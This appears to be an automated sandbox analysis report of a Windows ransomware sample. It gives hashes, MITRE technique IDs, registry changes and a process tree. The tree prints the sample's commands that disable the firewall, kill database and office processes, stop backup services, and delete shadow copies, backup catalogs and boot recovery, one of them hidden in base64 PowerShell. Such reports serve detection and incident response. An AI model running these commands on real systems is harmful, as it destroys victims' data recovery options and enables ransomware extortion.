4d0dabf226858d79c903e62f4422e95263f9c184f2c286e96a1d09560f44b6ec

General

Target

Deniz_K_z_.bin.exe
Size

3.4MB
MD5

fc78e6e58352151fb77a4b92f239d381
SHA1

4dda3af9601922394f0c16713180beb2ec88c050
SHA256

c8d49d874454bf1fa50cb7e4c00677e028af38e1d22e41476634d5d5a349cd7e
SHA512

4df0c69609087abc21be95574b6b09ff12253177a1dfee101ae7e24aa754d494fc837c41cfe636a686b644c9ebe7bf79fe805478ed75ee66a183208f7b3ca489

Score

10^/10

evasion trojan persistence ransomware

Malware Config

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Deniz_K_z_.bin.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Deniz_K_z_.bin.exe
Runs net.exe

Modifies service 2 TTPs 9 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

netsh.exevssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe

Disables Task Manager via registry modification
evasion
Drops file in Drivers directory 1 IoCs

Processes:

Deniz_K_z_.bin.exe

description ioc process

File created C:\Windows\System32\drivers\etc\host Deniz_K_z_.bin.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\host	Deniz_K_z_.bin.exe

Suspicious use of WriteProcessMemory 236 IoCs

Processes:

Deniz_K_z_.bin.execmd.execmd.execmd.execmd.execmd.exenet.execmd.execmd.exe

description	pid	process	target process
PID 824 wrote to memory of 1412	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1412	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1412	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1412	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1440	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1440	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1440	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1440	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 864	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 864	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 864	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 864	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 796	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 796	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 796	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 796	824	Deniz_K_z_.bin.exe	cmd.exe
PID 1412 wrote to memory of 360	1412	cmd.exe	netsh.exe
PID 1412 wrote to memory of 360	1412	cmd.exe	netsh.exe
PID 1412 wrote to memory of 360	1412	cmd.exe	netsh.exe
PID 1412 wrote to memory of 360	1412	cmd.exe	netsh.exe
PID 1440 wrote to memory of 1068	1440	cmd.exe	vssadmin.exe
PID 1440 wrote to memory of 1068	1440	cmd.exe	vssadmin.exe
PID 1440 wrote to memory of 1068	1440	cmd.exe	vssadmin.exe
PID 1440 wrote to memory of 1068	1440	cmd.exe	vssadmin.exe
PID 864 wrote to memory of 1064	864	cmd.exe	vssadmin.exe
PID 864 wrote to memory of 1064	864	cmd.exe	vssadmin.exe
PID 864 wrote to memory of 1064	864	cmd.exe	vssadmin.exe
PID 864 wrote to memory of 1064	864	cmd.exe	vssadmin.exe
PID 824 wrote to memory of 1828	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1828	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1828	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1828	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1848	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1848	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1848	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1848	824	Deniz_K_z_.bin.exe	cmd.exe
PID 796 wrote to memory of 1184	796	cmd.exe	taskkill.exe
PID 796 wrote to memory of 1184	796	cmd.exe	taskkill.exe
PID 796 wrote to memory of 1184	796	cmd.exe	taskkill.exe
PID 796 wrote to memory of 1184	796	cmd.exe	taskkill.exe
PID 824 wrote to memory of 1780	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1780	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1780	824	Deniz_K_z_.bin.exe	cmd.exe
PID 824 wrote to memory of 1780	824	Deniz_K_z_.bin.exe	cmd.exe
PID 1828 wrote to memory of 1764	1828	cmd.exe	net.exe
PID 1828 wrote to memory of 1764	1828	cmd.exe	net.exe
PID 1828 wrote to memory of 1764	1828	cmd.exe	net.exe
PID 1828 wrote to memory of 1764	1828	cmd.exe	net.exe
PID 1764 wrote to memory of 1620	1764	net.exe	net1.exe
PID 1764 wrote to memory of 1620	1764	net.exe	net1.exe
PID 1764 wrote to memory of 1620	1764	net.exe	net1.exe
PID 1764 wrote to memory of 1620	1764	net.exe	net1.exe
PID 1848 wrote to memory of 1588	1848	cmd.exe	powershell.exe
PID 1848 wrote to memory of 1588	1848	cmd.exe	powershell.exe
PID 1848 wrote to memory of 1588	1848	cmd.exe	powershell.exe
PID 1848 wrote to memory of 1588	1848	cmd.exe	powershell.exe
PID 1780 wrote to memory of 1552	1780	cmd.exe	vssadmin.exe
PID 1780 wrote to memory of 1552	1780	cmd.exe	vssadmin.exe
PID 1780 wrote to memory of 1552	1780	cmd.exe	vssadmin.exe
PID 1780 wrote to memory of 1552	1780	cmd.exe	vssadmin.exe
PID 1828 wrote to memory of 1904	1828	cmd.exe	net.exe
PID 1828 wrote to memory of 1904	1828	cmd.exe	net.exe
PID 1828 wrote to memory of 1904	1828	cmd.exe	net.exe
PID 1828 wrote to memory of 1904	1828	cmd.exe	net.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exe

pid process

1068 vssadmin.exe
1064 vssadmin.exe
1552 vssadmin.exe

pid	process
1068	vssadmin.exe
1064	vssadmin.exe
1552	vssadmin.exe

System policy modification 1 TTPs 17 IoCs

evasion

Modify Registry

T1112

Processes:

Deniz_K_z_.bin.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "1"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "1"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "1"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "5"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0"	Deniz_K_z_.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\undockwithoutlogon = "1"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\dontdisplaylastusername = "0"	Deniz_K_z_.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\scforceoption = "0"	Deniz_K_z_.bin.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "1"	Deniz_K_z_.bin.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1868	taskkill.exe
288	taskkill.exe
1428	taskkill.exe
1992	taskkill.exe
1888	taskkill.exe
1256	taskkill.exe
824	taskkill.exe
1564	taskkill.exe
1064	taskkill.exe
2036	taskkill.exe
2024	taskkill.exe
1184	taskkill.exe
1472	taskkill.exe
108	taskkill.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

Processes:

vssvc.exetaskkill.exeWMIC.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeBackupPrivilege	1700	vssvc.exe
Token: SeRestorePrivilege	1700	vssvc.exe
Token: SeAuditPrivilege	1700	vssvc.exe
Token: SeDebugPrivilege	1184	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1168	WMIC.exe
Token: SeSecurityPrivilege	1168	WMIC.exe
Token: SeTakeOwnershipPrivilege	1168	WMIC.exe
Token: SeLoadDriverPrivilege	1168	WMIC.exe
Token: SeSystemProfilePrivilege	1168	WMIC.exe
Token: SeSystemtimePrivilege	1168	WMIC.exe
Token: SeProfSingleProcessPrivilege	1168	WMIC.exe
Token: SeIncBasePriorityPrivilege	1168	WMIC.exe
Token: SeCreatePagefilePrivilege	1168	WMIC.exe
Token: SeBackupPrivilege	1168	WMIC.exe
Token: SeRestorePrivilege	1168	WMIC.exe
Token: SeShutdownPrivilege	1168	WMIC.exe
Token: SeDebugPrivilege	1168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1168	WMIC.exe
Token: SeRemoteShutdownPrivilege	1168	WMIC.exe
Token: SeUndockPrivilege	1168	WMIC.exe
Token: SeManageVolumePrivilege	1168	WMIC.exe
Token: 33	1168	WMIC.exe
Token: 34	1168	WMIC.exe
Token: 35	1168	WMIC.exe
Token: SeDebugPrivilege	108	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1168	WMIC.exe
Token: SeSecurityPrivilege	1168	WMIC.exe
Token: SeTakeOwnershipPrivilege	1168	WMIC.exe
Token: SeLoadDriverPrivilege	1168	WMIC.exe
Token: SeSystemProfilePrivilege	1168	WMIC.exe
Token: SeSystemtimePrivilege	1168	WMIC.exe
Token: SeProfSingleProcessPrivilege	1168	WMIC.exe
Token: SeIncBasePriorityPrivilege	1168	WMIC.exe
Token: SeCreatePagefilePrivilege	1168	WMIC.exe
Token: SeBackupPrivilege	1168	WMIC.exe
Token: SeRestorePrivilege	1168	WMIC.exe
Token: SeShutdownPrivilege	1168	WMIC.exe
Token: SeDebugPrivilege	1168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1168	WMIC.exe
Token: SeRemoteShutdownPrivilege	1168	WMIC.exe
Token: SeUndockPrivilege	1168	WMIC.exe
Token: SeManageVolumePrivilege	1168	WMIC.exe
Token: 33	1168	WMIC.exe
Token: 34	1168	WMIC.exe
Token: 35	1168	WMIC.exe
Token: SeDebugPrivilege	1064	taskkill.exe
Token: SeDebugPrivilege	824	taskkill.exe
Token: SeDebugPrivilege	2036	taskkill.exe
Token: SeDebugPrivilege	1868	taskkill.exe
Token: SeDebugPrivilege	288	taskkill.exe
Token: SeDebugPrivilege	1428	taskkill.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	1472	taskkill.exe
Token: SeDebugPrivilege	1992	taskkill.exe
Token: SeDebugPrivilege	1888	taskkill.exe
Token: SeDebugPrivilege	1256	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1588 powershell.exe
1588 powershell.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

pid	process
1588	powershell.exe
1588	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe
"C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe"
1⤵
- Checks whether UAC is enabled
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
- System policy modification
PID:824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable
2⤵
- Suspicious use of WriteProcessMemory
PID:1412

C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode disable
3⤵
- Modifies service
PID:360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
2⤵
- Suspicious use of WriteProcessMemory
PID:1440

C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:1068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
2⤵
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:1064

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
2⤵
- Suspicious use of WriteProcessMemory
PID:796

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sql.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im winword.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:108

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im wordpad.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1064

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im outlook.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:824

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im thunderbird.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2036

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im oracle.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1868

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im excel.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:288

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im onenote.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1428

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im virtualboxvm.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im node.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im QBW32.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WBGX.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Teams.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1256

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Flow.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
2⤵
- Suspicious use of WriteProcessMemory
PID:1828

C:\Windows\SysWOW64\net.exe
net stop DbxSvc
3⤵
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DbxSvc
4⤵
PID:1620

C:\Windows\SysWOW64\net.exe
net stop OracleXETNSListener
3⤵
PID:1904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleXETNSListener
4⤵
PID:1916

C:\Windows\SysWOW64\net.exe
net stop OracleServiceXE
3⤵
PID:1992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleServiceXE
4⤵
PID:1972

C:\Windows\SysWOW64\net.exe
net stop AcrSch2Svc
3⤵
PID:828

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc
4⤵
PID:2040

C:\Windows\SysWOW64\net.exe
net stop AcronisAgent
3⤵
PID:1492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent
4⤵
PID:1072

C:\Windows\SysWOW64\net.exe
net stop Apache2.4
3⤵
PID:1840

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Apache2.4
4⤵
PID:1776

C:\Windows\SysWOW64\net.exe
net stop SQLWriter
3⤵
PID:1644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter
4⤵
PID:1596

C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQLEXPRESS
3⤵
PID:1764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
4⤵
PID:1300

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
3⤵
PID:1892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
4⤵
PID:1948

C:\Windows\SysWOW64\net.exe
net stop MongoDB
3⤵
PID:1896

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MongoDB
4⤵
PID:1964

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SQLEXPRESS
3⤵
PID:1080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
4⤵
PID:1648

C:\Windows\SysWOW64\net.exe
net stop SQLBrowser
3⤵
PID:1560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser
4⤵
PID:1608

C:\Windows\SysWOW64\net.exe
net stop CobianBackup11
3⤵
PID:1576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CobianBackup11
4⤵
PID:1044

C:\Windows\SysWOW64\net.exe
net stop cbVSCService11
3⤵
PID:1528

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop cbVSCService11
4⤵
PID:1772

C:\Windows\SysWOW64\net.exe
net stop QBCFMontorService
3⤵
PID:1596

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMontorService
4⤵
PID:1940

C:\Windows\SysWOW64\net.exe
net stop QBVSS
3⤵
PID:792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBVSS
4⤵
PID:1544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Suspicious use of WriteProcessMemory
PID:1848

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1588

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
2⤵
- Suspicious use of WriteProcessMemory
PID:1780